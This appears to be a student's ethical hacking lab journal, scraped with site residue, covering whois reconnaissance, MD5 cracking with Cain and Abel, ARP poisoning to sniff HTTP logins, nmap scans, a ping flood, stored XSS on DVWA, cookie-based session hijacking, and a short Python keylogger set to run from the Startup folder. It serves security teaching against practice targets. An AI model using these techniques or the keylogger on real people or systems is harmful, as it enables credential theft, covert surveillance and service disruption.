Eh - 754 All Practical

TYBSc CS SEM VI ROLL NO.
754
Practical No: 01
Aim: Google and Whois Reconnaissance:

A. Use Google search techniques to gather information about a specific target or
organization.
B. Utilize advanced search operators to refine search results and access hidden
information.
C. Perform Whois lookups to retrieve domain registration information and gather
details about the target's infrastructure.
Case 1 :-
Step 1: Search any random website on the browser, in this case we have
searched for a prestashop.
Step 2: Some information about searched website from wikipedia
Step 3: Official website of prestashop.
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 4: Now, search on browser about who.is or about godaddy.com
Step 5: Some information about who.is from wikipedia.
Step 6: Official website of who.is and enter the domain about the website,
Ethical hacking
whose information we want to know.
Step 7: After entering domain name or IP address hit enter
Step 8: Information that who.is knows about prestashop.
Ethical hacking
Ethical hacking
Step 9: After having looked at the information that is available with who.is . one can even
have a look at the DNS record of the searched website.
Ethical hacking
Step 10: Once done with a DNS record, one can have a look at the Diagnostic Section. In
which who.is server sends a request to the server of the searched website that is prestashop
server.
Case 2:-
Step 1: Search any random website on the browser, in this case we have
Searched amazon prime video
Ethical hacking
Step 2: Some information about searched website from wikipedia
Step 3: Official website of amazon prime video.
Ethical hacking
Step 4: Now, search on browser about who.is or about godaddy.com
Step 5: Some information about who.is from wikipedia.
Step 6: Official website of who.is and enter the domain about the website,
whose information we want to know.
Ethical hacking
Step 7: After entering domain name or IP address hit enter
Step 8: Information that who.is knows about prime video.
Ethical hacking
Step 9: After having looked at the information that is available with who.is . one can even
have a look at the DNS record of the searched website.
Ethical hacking
Step 10: Once done with a DNS record, one can have a look at the Diagnostic Section. In
which who.is server sends a request to the server of the searched website that is the prime
video server.
Ethical hacking
Ethical hacking
Practical No: 02
Aim : Password Encryption and Cracking with CrypTool and Cain and Abel
A. Use CrypTool to encrypt and decrypt passwords using the RC4 algorithm.
B. Use Cain and Abel for cracking Windows account password using Dictionary
attack and brute force attack.
Procedure :-
A. CrypTool
Step 1: Interface of the CrypTool
Step 2: Now, enter plaintext that is to encrypted in order to do so click on File → New.
Step 3: Select algorithm that is to be used for encrypting plaintext. Here in this case we are
making use of a Symmetric encryption algorithm for encrypting plaintext. In order to do so
we need to click on “ Encrypt / Decrypt → Symmetric (modern) → RC4.
Ethical hacking
Step 4: Here we need to enter key length and the key that should be used to encrypt plaintext
by using the RC4 algorithm.
Step 5: After clicking on the encrypt button, cipher text of the respective plain text will be
displayed.
Ethical hacking
Step 6: Now, once plaintext is encrypted successfully, we need to decrypt ciphertext this can
also be done by the same way as of encrypting plaintext, Encrypt / Decrypt → Symmetric
(modern) → RC4 → Decrypt
Step 7: after clicking on “Decrypt”, ciphertext will be converted back to plaintext.
B. Use Cain and Abel

For this practical we need to turn off the antivirus of the respective system, because antivirus
does not allow software to get installed.
Interface:
Ethical hacking
Step 1: Open Cain and Abel application, then click on Hash Calculator.
Step 2: Below given screen will appear, enter plaintext in respective field and then click on
calculate hash
Ethical hacking
MD5 :- D08AE25CABA6A431331E222D45638061
Step 3: After the MD5 hash value of the given plaintext is generated, preserve it. Now, click
on the “Cracker” tab, there click on “MD5 Hashes”, then click on grid anywhere, after
clicking on grid “Plus” will be enabled where we need to hash a value that is to be decrypted
using a dictionary and brute-force attack.
Step 4: After clicking on “Plus” sign, pop-up will appear where we need to enter MD5 hash
value
Ethical hacking
Step 5: After entering MD5 hash value, click on the “OK” button, MD5 value will appear in
the grid. Right click on MD5 value in order to launch Dictionary attack.
Step 6: After clicking on “Dictionary Attack”, below given screen will appear
Step 7: In order to make a dictionary attack successful, we need to add the respective key in
the “dictionary list” of the software.
Ethical hacking
Step 8: Insert updated word list as an input to dictionary attack.
Ethical hacking
Step 9: After inserting the word list, click on start, after some time respective words will
appear in the output of the dictionary attack. If we don’t enter the key in the word list then the
dictionary attack will not be able to crack MD5 Hash value.
Ethical hacking
Step 10: Now, in order to do “Brute-Force attack”, again right click on MD5 value
Step 11: After clicking on “Brute-Force attack”, below the given window will appear, here
just click on “start” button to launch brute-force attack.
Step 12: When we do brute force attack after dictionary attack, then we get output in very
less amount of time but if we do brute-force attack without performing prior dictionary attack
then brute-force attack will take a lot of time to crack the MD5 Hash value
Ethical hacking
Ethical hacking
Practical No: 03
Aim: Linux Network Analysis and ARP Poisoning

A. Linux Network Analysis:
1. Execute the ifconfig command to retrieve network interface information.
2. Use the ping command to test network connectivity and analyze the output.
3. Analyze the netstat command output to view active network connections.
4. Perform a traceroute to trace the route packets take to reach a target host.
B. ARP Poisoning:
1. Use ARP poisoning techniques to redirect network traffic on a Windows
system.
2. the effects of ARP poisoning on network communication and Security.
Part A :-
Step 1: Create Virtual Machine in order to run Ubuntu OS in Host Windows OS.
Command 1: ipconfig
Windows:ipconfig
Ubuntu:ifconfig
Ethical hacking
Command 2 :- netstat(Windows)
Ubuntu:
Ethical hacking
Command 3 :- ping (any ip address or domain name)(Windows):
Ubuntu:
Command 4 :- Traceroute (any ip address or domain name)(Windows):
Ethical hacking
Ubuntu:
Part B: Arp Poisoning:
Step 1: Open Cain and Abel application. Once the application is launched successfully, click
on “start/stop sniffing” and then click on the “sniffer” tab.
Ethical hacking
Step 2: Now, in the sniffer tab click anywhere on the grid in order to enable the “plus” sign,
once it gets enabled click on it, below the given screen will appear.
Here, select “All Test” checkbox then click on “OK”
Step 3: Software will find the IP address and Default Gateway of all devices available on the
network.
Ethical hacking
Step 4: Click on “APR” and then anywhere on the grid in order to enable plus sign. Once it
gets enabled click on it.
Ethical hacking
Step 5: On the left side we need to select the default Gateway and on the right side we need
to select the IP address of the target machine
Step 6: After specifying IP address and Default Gateway of the target machine, click on
“start/stop APR”, it will start poisoning the network of the target machine and will capture all
the data that are sent from the respective target machine
Step 7: The PC who's IP address is entered for poisoning, from that system the user will have
to login to any not secure login page for example: http://testphp.vulnweb.com/login.php and
enter login credentials and try logging in.
Ethical hacking
Step 8: After poisoning the network of the target machine, we need to go to the password tab
which is present at the bottom and from there on the “HTTP” tab as requests are sent via http
protocol
Ethical hacking
Practical No: 04
Aim: Port Scanning with NMap:

A. Use NMap to perform an ACK scan to determine if a port is filtered, unfiltered,
or open.
B. Perform SYN, FIN, NULL, and XMAS scans to identify open ports and their
characteristics.
C. Analyze the scan results to gather information about the target system's network
services.
1. ACK : ACK scan is enabled by specifying the -sA option.Its probe packet has only the
ACK flag set(unless you use -scanflags).
nmap -sA -T4 scanme.nmap.org
Windows:
Nmap:
2. SYN: short for synchromize.SYN is a TCP packet sent to another computer requesting
that a connection be established between them.
nmap -p22,113,139 scanme.nmap.org
Windows:
Ethical hacking
Nmap:
3. FIN:The standard use of a FIN packet is to terminate the TCP connection-typically after
the data transfer is complete.
nmap -sF -T4 scanme.nmap.org
Windows:
Ethical hacking
Nmap:
4. NULL : Nmap exploits this with three scan types: Null scan(-sN) does not set any bit (TCP
flag header is 0) FIn scan(-sF) sets just the TCP FIN bit...(incomplete h)
nmap -sN -p22 scanme.nmap.org
Windows:
Ethical hacking
Nmap:
5. XMAS: Xmas scan (-sX) Sets the FIN , PSH, and URG flags, lighting the packet
Christmass Tree
nmap -sX -T4 scanme.nmap.org
Windows:
Nmap:
Ethical hacking
Practical No: 05
Aim: Network Traffic Capture and DoS Attack with Wireshark and Nemesy.
A. Network Traffic Capture:
1. Use Wireshark to capture network traffic on a specific network interface.
2. Analyze the captured packets to extract relevant information and identify
potential security issues.
B. Denial of Service (DoS) Attack:
1. Use Nemesy to launch a DoS attack against a target system or network.
2. Observe the impact of the attack on the target's availability and
performance.
Step 1: Open Wireshark and start capturing a filter(Ethernet)
Ethical hacking
Step 2: Go to any website that is not secure and try logging in.
http://testphp.vulnweb.com/login.php
Step 3: Go to Wireshark and enter the filter: http
Step 4: The login details are captured.
Ethical hacking
Denial of Service (DoS) Attack:
Step 1: Open Command Prompt.
Step 2: Find the ip address of the victim system and put the following command in cmd.
Command: ping 192.168.2.43 -t-100
Ethical hacking
Step 3: Press Enter, the packets start to deliver
Victim PC’s CPU performance:
Ethical hacking
Practical No: 06
Aim: Simulate persistent cross-site scripting attack.
Step 1: Copy the DVMA folder from “E\TYCS EH Tools\DVMA-Master”
Step 2: Paste it into “C\xampp\htdocs”
Step 3: DVMA → config → config.inc.php.dist

Open this respective file in any of your favorite text editors.
Content of the file.
Ethical hacking
Step 4: Change the highlighted data in the File:
Step 5: Save As php
Ethical hacking
Step 6: Start xampp server (Apache and MySql) and in browser open
http://localhost/DVWA/ On any web browser
Ethical hacking
Step 7: Once loaded, the below given page will be displayed. → Click on Setup/ Reset
Database.
Ethical hacking
Step 8: Scroll Down the page and Click on “Create/ Reset Database”
Ethical hacking
Step 9: The below fields should be displayed after clicking the button.
Step 10: Logout and then Login with Username and Password.
Username :- admin
Password:- password
Ethical hacking
Ethical hacking
Step 11: Set the DVWA security level in DVMA security tab to low, after selecting security
level click on submit in order to change security level.
Step 12: Click on XSS (Stored) → Fill the Name and write script code in Message as
Follows:
<script>{alert(“Performed by 754_durgesh ”)}</script>
Ethical hacking
Step 13: Click on Sign Guestbook
Ethical hacking
Practical No: 08
Aim: Session impersonation with Firefox and Tamper Data

A. Install and configure the Tamper Data add-on in Firefox.
B. Intercept and modify HTTP requests to impersonate a user} session.
C. Understand the impact of session impersonation, and the importance of session
management
Step 1: Install and open Firefox browser → Go to Add-ons and search Tamper.
Step 2: Search for Cookie Editor and Add.
Ethical hacking
Step 3: After adding both Add-ons. In new tab go to http://www.techpanda.org/

Enter Email as: admin@google.com
Enter Password as: Password2010
Step 4: Dashboard page appears
Ethical hacking
Step 5: Click on Cookie editor Add-on on top right corner. Copy this session id.
Ethical hacking
Step 6: Go to FireFox Settings/options/privacy and delete cookies.
Ethical hacking
Step 7: go to add on select Tamper /Run extension and Start tamper data -> Click yes.
Step 8:Go to techpanda.org and Enter url as index.php
Ethical hacking
Step 9: In index.php page Paste the copied session id in cookie and click ok
Ethical hacking
You will be logged in the dashboard directly without logging in.
Ethical hacking
Practical No: 09
Aim:Creating a Keylogger with Python

A. Write a Python script that captures and logs keystrokes from a target system.
B. Execute the keylogger script and observe the logged keystrokes.
C. Understand the potential security risks associated with keyloggers and the
importance of protecting against them.
Step 1: Go to the path where your Python file is located and open cmd in the Scripts Folder.
Install the required library.
Pip install pynput
Step 2: Create a new file in IDLE and enter the following code.
Input:
from pynput.keyboard import Key,Listener
import logging
log_dir = "C:\\Users\\Administrator\\AppData\\Local\\Programs\\Python\\Python311\\
p9.pyw"
logging.basicConfig(filename=(log_dir+"keylogger123.txt"),level=logging.DEBUG,format='
%(asctime)s%(message)s')
def on_press(key):
logging.info(str(key))
with Listener(on_press=on_press) as listener:
listener.join()
Step 3: Save the file with the .pyw extension.
Ethical hacking
Step 4: Open the Start-up folder as shown below.
Output:
Ethical hacking

Eh - 754 All Practical

Uploaded by

Copyright:

Available Formats

You might also like

Eh - 754 All Practical

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Eh - 754 All Practical

Uploaded by

Copyright:

Available Formats

TYBSc CS SEM VI ROLL NO.

Aim: Google and Whois Reconnaissance:

Step 2: Some information about searched website from wikipedia

Step 3: Official website of prestashop.

Step 4: Now, search on browser about who.is or about godaddy.com

Step 5: Some information about who.is from wikipedia.

whose information we want to know.

Step 7: After entering domain name or IP address hit enter

Step 8: Information that who.is knows about prestashop.

Step 2: Some information about searched website from wikipedia

Step 3: Official website of amazon prime video.

Step 4: Now, search on browser about who.is or about godaddy.com

Step 5: Some information about who.is from wikipedia.

Step 7: After entering domain name or IP address hit enter

Step 8: Information that who.is knows about prime video.

Step 1: Interface of the CrypTool

Step 7: after clicking on “Decrypt”, ciphertext will be converted back to plaintext.

B. Use Cain and Abel

Step 8: Insert updated word list as an input to dictionary attack.

Aim: Linux Network Analysis and ARP Poisoning

Command 3 :- ping (any ip address or domain name)(Windows):

Command 4 :- Traceroute (any ip address or domain name)(Windows):

Part B: Arp Poisoning:

Here, select “All Test” checkbox then click on “OK”

Aim: Port Scanning with NMap:

Step 1: Open Wireshark and start capturing a filter(Ethernet)

Step 3: Go to Wireshark and enter the filter: http

Step 4: The login details are captured.

Denial of Service (DoS) Attack:

Step 1: Open Command Prompt.

Step 3: Press Enter, the packets start to deliver

Victim PC’s CPU performance:

Aim: Simulate persistent cross-site scripting attack.

Step 1: Copy the DVMA folder from “E\TYCS EH Tools\DVMA-Master”

Step 2: Paste it into “C\xampp\htdocs”

Step 3: DVMA → config → config.inc.php.dist

Content of the file.

Step 4: Change the highlighted data in the File:

Step 5: Save As php

Step 13: Click on Sign Guestbook

Aim: Session impersonation with Firefox and Tamper Data

Step 2: Search for Cookie Editor and Add.

Step 3: After adding both Add-ons. In new tab go to http://www.techpanda.org/

Step 4: Dashboard page appears

Step 6: Go to FireFox Settings/options/privacy and delete cookies.

Step 8:Go to techpanda.org and Enter url as index.php

You will be logged in the dashboard directly without logging in.

Aim:Creating a Keylogger with Python

Step 3: Save the file with the .pyw extension.

Step 4: Open the Start-up folder as shown below.

You might also like